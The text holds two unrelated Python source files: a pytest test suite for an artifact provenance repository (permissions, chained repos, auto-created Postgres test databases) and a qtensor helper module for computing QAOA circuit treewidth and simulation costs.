{'123'} def test_repo_raises_key_error_when_set_id_not_found(repo): with pytest.raises(KeyError) as e: repo.get_set_by_id('foo') def test_repo_raises_key_error_when_set_name_not_found(repo): with pytest.raises(KeyError) as e: repo.get_set_by_labels('foo') def test_repo_contains_set(repo): assert not repo.contains_set('foo') artifact = artifact_record(id='123') repo.put(artifact) artifact_set = r.ArtifactSet([artifact.id], 'foo') repo.put_set(artifact_set) assert repo.contains_set(artifact_set.id) def test_repo_delete_set(repo): artifact = artifact_record(id='123') repo.put(artifact) artifact_set = r.ArtifactSet(['123'], 'foo') repo.put_set(artifact_set) repo.delete_set(artifact_set.id) with pytest.raises(KeyError) as e: repo.get_set_by_id(artifact_set.id) def test_permissions(atomic_repo): repo = atomic_repo artifact = artifact_record() repo._write = False assert not repo._write with pytest.raises(cs.PermissionError) as e: repo.put(artifact) assert artifact not in repo repo._write = True repo.put(artifact) repo._read = False with pytest.raises(cs.PermissionError) as e: repo.get_by_id(artifact.id) with pytest.raises(cs.PermissionError) as e: repo.get_by_value_id(artifact.value_id) with pytest.raises(cs.PermissionError) as e: repo.get_value(artifact.id) with pytest.raises(cs.PermissionError) as e: repo.get_inputs(artifact) with pytest.raises(cs.PermissionError) as e: artifact.id in repo repo._read = True assert repo.get_by_id(artifact.id) assert artifact.id in repo repo._delete = False with pytest.raises(cs.PermissionError) as e: repo.delete(artifact.id) repo._delete = True repo.delete(artifact.id) assert artifact.id not in repo def test_chained_with_readonly(): read_repo = r.MemoryRepo([artifact_record(id='foo')], read=True, write=False, delete=False) write_repo = r.MemoryRepo(read=True, write=True, delete=False) repos = [read_repo, write_repo] chained = r.ChainedRepo(repos) # verify we read from the read-only store assert 'foo' in chained # but that it is not written to record = artifact_record(id='bar', value_id='baz') chained.put(record) assert 'bar' in chained assert 'bar' in write_repo assert 'bar' not in read_repo assert chained.get_by_value_id(record.value_id).id == record.id assert chained.get_by_id(record.id).id == record.id assert chained.get_value(record) == record.value def test_chained_read_through_write(): foo = artifact_record(id='foo') read_repo = r.MemoryRepo([foo], read=True, write=False) repo_ahead = r.MemoryRepo(read=True, write=True, read_through_write=True) read_through_write_repo = r.MemoryRepo(read=True, write=True, read_through_write=True) no_read_through_write_repo = r.MemoryRepo(read=True, write=True, read_through_write=False) repos = [no_read_through_write_repo, read_through_write_repo, read_repo, repo_ahead] chained_repo = r.ChainedRepo(repos) assert 'foo' not in read_through_write_repo assert 'foo' not in no_read_through_write_repo assert 'foo' not in repo_ahead # verify we read from the read-only store assert chained_repo['foo'].id == foo.id assert 'foo' in read_through_write_repo assert 'foo' not in repo_ahead assert 'foo' not in no_read_through_write_repo def test_chained_writes_may_be_allowed_on_read_throughs_only(): foo = artifact_record(id='foo') read_repo = r.MemoryRepo([foo], read=True, write=False) read_through_write_only_repo = r.MemoryRepo(read=True, write=False, read_through_write=True) write_repo = r.MemoryRepo(read=True, write=True, read_through_write=False) repos = [write_repo, read_through_write_only_repo, read_repo] chained_repo = r.ChainedRepo(repos) # verify we read from the read-only repo assert chained_repo['foo'].id == foo.id assert 'foo' in read_through_write_only_repo assert 'foo' not in write_repo bar = artifact_record(id='bar') chained_repo.put(bar) assert 'bar' in chained_repo assert 'bar' not in read_through_write_only_repo assert 'bar' in write_repo def test_db_is_automatically_created_and_migrated(disk_store): db_conn_str = 'postgresql://localhost/test_provenance_autocreate' if sql_utils.database_exists(db_conn_str): sql_utils.drop_database(db_conn_str) repo = r.PostgresRepo(db_conn_str, disk_store, read=True, write=True, delete=True, create_db=True) p.set_default_repo(repo) @p.provenance() def calculate(a, b): return a + b assert sql_utils.database_exists(db_conn_str) # make sure it all works assert calculate(1, 2) == 3 p.set_default_repo(None) sql_utils.drop_database(db_conn_str) def test_db_is_automatically_created_and_migrated_with_the_right_schema(disk_store): db_conn_str = 'postgresql://localhost/test_provenance_autocreate_schema' if sql_utils.database_exists(db_conn_str): sql_utils.drop_database(db_conn_str) repo = r.PostgresRepo(db_conn_str, disk_store, read=True, write=True, delete=True, create_db=True, schema='foobar') p.set_default_repo(repo) @p.provenance() def calculate(a, b): return a + b assert calculate(1, 2) == 3 with repo.session() as s: res = pd.read_sql("select * from foobar.artifacts", s.connection()) repo2 = r.PostgresRepo(db_conn_str, disk_store, read=True, write=True, delete=True, create_db=True, schema='baz') p.set_default_repo(repo2) assert calculate(5, 5) == 10 with repo2.session() as s: res = pd.read_sql("select * from baz.artifacts", s.connection()) assert res.iloc[0]['inputs_json'] == {'b': 5, 'a': 5, '__varargs': []} p.set_default_repo(None) sql_utils.drop_database(db_conn_str) def xtest_db_is_automatically_migrated(disk_store): db_conn_str = 'postgresql://localhost/test_provenance_automigrate' if sql_utils.database_exists(db_conn_str): sql_utils.drop_database(db_conn_str) sql_utils.create_database(db_conn_str) repo = r.PostgresRepo(db_conn_str, disk_store, read=True, write=True, delete=True, create_db=False, upgrade_db=True) p.set_default_repo(repo) @p.provenance() def calculate(a, b): return a + b # make sure it all works assert calculate(1, 2) == 3 p.set_default_repo(None) sql_utils.drop_database(db_conn_str) def test_artifact_proxy_works_with_iterables(): class Foo(object): def __init__(self, a): self.a = a def __next__(self): return self.a foo = r.artifact_proxy(Foo(5), 'stub artifact') assert next(foo) == 5
import networkx as nx import numpy as np from itertools import repeat from tqdm.auto import tqdm import time from multiprocessing.dummy import Pool from qtensor.optimisation.TensorNet import QtreeTensorNet from qtensor.optimisation.Optimizer import OrderingOptimizer, TamakiOptimizer, WithoutOptimizer, TamakiTrimSlicing, DefaultOptimizer from qtensor.optimisation import RGreedyOptimizer, LateParOptimizer from qtensor.utils import get_edge_subgraph from qtensor import QtreeQAOAComposer, OldQtreeQAOAComposer, ZZQtreeQAOAComposer, DefaultQAOAComposer def bethe_graph(p, degree): def add_two_nodes_to_leafs(graph): """ Works in-place """ leaves = [n for n in graph.nodes() if graph.degree(n) <= degree-2] n = graph.number_of_nodes() for leaf in leaves: next_edges = [(leaf, n+x) for x in range(1, degree)] graph.add_edges_from(next_edges) n += 2 graph = nx.Graph() graph.add_edges_from([(0,1)]) for i in range(p): add_two_nodes_to_leafs(graph) return graph def random_graph(nodes, type='random', **kwargs): """ Generate a random graph Parameters: nodes: int Number of nodes in the graph type: enum['random', 'erdos_renyi'] algorithm to use **kwargs: keyword arguments to specific algorithm usually of form seed: int degree: int """ if type == 'random': return nx.random_regular_graph(n=nodes, d=kwargs['degree'] , seed=kwargs.get('seed')) if type == 'erdos_renyi': prob_of_edge_add = kwargs['degree']/(nodes-1) return nx.erdos_renyi_graph(n=nodes, p=prob_of_edge_add , seed=kwargs.get('seed')) else: raise ValueError('Unsupported graph type') def get_slicing_algo(slicing_algo, par_vars, ordering_algo='default'): if 'late-slice' in slicing_algo: if '_' in slicing_algo: _, bunch_size = slicing_algo.split('_') bunches = int(bunch_size) else: bunches = 1 optimizer = LateParOptimizer( n_bunches=bunches, par_vars=par_vars, ordering_algo=ordering_algo ) else: raise ValueError(f'Slicing algorithm not supported: {slicing_algo}') return optimizer def get_ordering_algo(ordering_algo, par_vars=0): """ Get optimizer instance from its string specifier. """ if 'tamaki' in ordering_algo: wait_time = 10 if '_' in ordering_algo: params = ordering_algo.split('_') wait_time = float(params[-1]) if 'slice' in ordering_algo: max_tw = 25 optimizer = TamakiTrimSlicing(max_tw=max_tw, wait_time=wait_time) else: optimizer = TamakiOptimizer(wait_time=wait_time) elif 'rgreedy' in ordering_algo: if '_' in ordering_algo: params = ordering_algo.split('_') if len(params) == 2: _, temp = ordering_algo.split('_') repeats = 10 else: _, temp, repeats = ordering_algo.split('_') repeats = int(repeats) temp = float(temp) else: temp = 2 repeats = 10 optimizer = RGreedyOptimizer(temp=temp, repeats=repeats) elif ordering_algo == 'greedy': optimizer = OrderingOptimizer() elif ordering_algo == 'default': optimizer = DefaultOptimizer() else: raise ValueError('Ordering algorithm not supported') return optimizer def get_cost_params(circ, ordering_algo='greedy'): tn = QtreeTensorNet.from_qtree_gates(circ) opt = get_ordering_algo(ordering_algo) peo, _ = opt.optimize(tn) treewidth = opt.treewidth mems, flops = tn.simulation_cost(peo) return treewidth, max(mems), sum(flops) def optimize_circuit(circ, algo='greedy', tamaki_time=15): # Should I somomehow generalize the tamaki-time argument? provide something like # Optimizer-params argument? How would cli parse this? opt = get_ordering_algo(algo) tn = QtreeTensorNet.from_qtree_gates(circ) peo, tn = opt.optimize(tn) return peo, tn, opt def get_tw(circ, ordering_algo='greedy', tamaki_time=15): peo, tn, opt = optimize_circuit(circ, algo=ordering_algo, tamaki_time=tamaki_time) treewidth = opt.treewidth return treewidth def get_cost_params(circ, ordering_algo='greedy', overflow_tw=None): peo, tn, opt = optimize_circuit(circ, algo=ordering_algo) treewidth = opt.treewidth print('tw', treewidth) if overflow_tw is not None: if treewidth > overflow_tw: mems, flops = [np.inf], [np.inf] return treewidth, np.inf, np.inf mems, flops = tn.simulation_cost(peo) return treewidth, max(mems), sum(flops) def qaoa_energy_lightcone_iterator(G, p, max_time=None, composer_type='default'): gamma, beta = [0.1]*p, [0.3]*p if max_time: start = time.time() else: start = np.inf if composer_type=='default': Composer = DefaultQAOAComposer elif composer_type=='cylinder': Composer = OldQtreeQAOAComposer elif composer_type=='cone': Composer = QtreeQAOAComposer elif composer_type=='ZZ': Composer = ZZQtreeQAOAComposer else: allowed_composers = ['default', 'cylinder', 'cone', 'ZZ'] raise Exception(f"Composer type not recognized, use one of: {allowed_composers}") for edge in G.edges(): composer = Composer(G, beta=beta, gamma=gamma) composer.energy_expectation_lightcone(edge) subgraph = get_edge_subgraph(G, edge, len(beta)) yield composer.circuit, subgraph if time.time() - start > max_time: break def qaoa_energy_cost_params_stats_from_graph(G, p, max_time=0, max_tw=None, ordering_algo='greedy', print_stats=False): cost_params = [] tw = mem = flop = 0 with tqdm(total=G.number_of_edges(), desc='Edge iteration') as pbar: for circ, subgraph in qaoa_energy_lightcone_iterator(G, p, max_time=max_time): _tw, _m, _f = cost_params(circ, ordering_algo=ordering_algo, overflow_tw=max_tw) tw = max(tw, _tw) mem = max(mem, _m) flop += _f pbar.set_postfix(current_tw=tw, subgraph_nodes=subgraph.number_of_nodes()) return tw, mem, flop def _twidth_parallel_unit(args): circ_graph, ordering_algo, tamaki_time, max_tw = args circuit, subgraph = circ_graph tw = get_tw(circuit, ordering_algo=ordering_algo, tamaki_time=tamaki_time) if max_tw: if tw>max_tw: print(f'Encountered treewidth of {tw}, which is larger {max_tw}') raise ValueError(f'Encountered treewidth of {tw}, which is larger {max_tw}') return tw def qaoa_energy_tw_from_graph(G, p, max_time=0, max_tw=0, ordering_algo='greedy', print_stats=False, tamaki_time=15, n_processes=1, composer_type='default'): lightcone_gen = qaoa_energy_lightcone_iterator(G, p, max_time=max_time, composer_type=composer_type) arggen = zip(lightcone_gen, repeat(ordering_algo), repeat(tamaki_time), repeat(max_tw)) if n_processes > 1: print('n_processes', n_processes) with Pool(n_processes) as p: twidths = list(tqdm(p.imap(_twidth_parallel_unit, arggen), total=G.number_of_edges())) else: twidths = [] with tqdm(total=G.number_of_edges(), desc='Edge iteration') as pbar: for args in arggen: circ_graph, ordering_algo, tamaki_time, max_tw = args circuit, subgraph = circ_graph tw = _twidth_parallel_unit(args) pbar.update() pbar.set_postfix(current_tw=tw, subgraph_nodes=subgraph.number_of_nodes()) twidths.append(tw) if print_stats: print(f'med={np.median(twidths)} mean={round(np.mean(twidths), 2)} max={np.max(twidths)}') return twidths def qaoa_energy_cost_params_from_graph(G, p, max_time=0, max_tw=0, ordering_algo='greedy', print_stats=False): costs = [] with tqdm(total=G.number_of_edges(), desc='Edge iteration') as pbar: for circuit, subgraph in qaoa_energy_lightcone_iterator(G, p, max_time=max_time): c = get_cost_params(circuit, ordering_algo=ordering_algo) if max_tw: if c[0]>max_tw: print(f'Encountered treewidth of {c[0]}, which is larger {max_tw}') break costs.append(c) pbar.update(1) pbar.set_postfix(current_costs=c, subgraph_nodes=subgraph.number_of_nodes()) if print_stats: print(f'med={np.median(costs)} mean={round(np.mean(costs), 2)} max={np.max(costs)}') return costs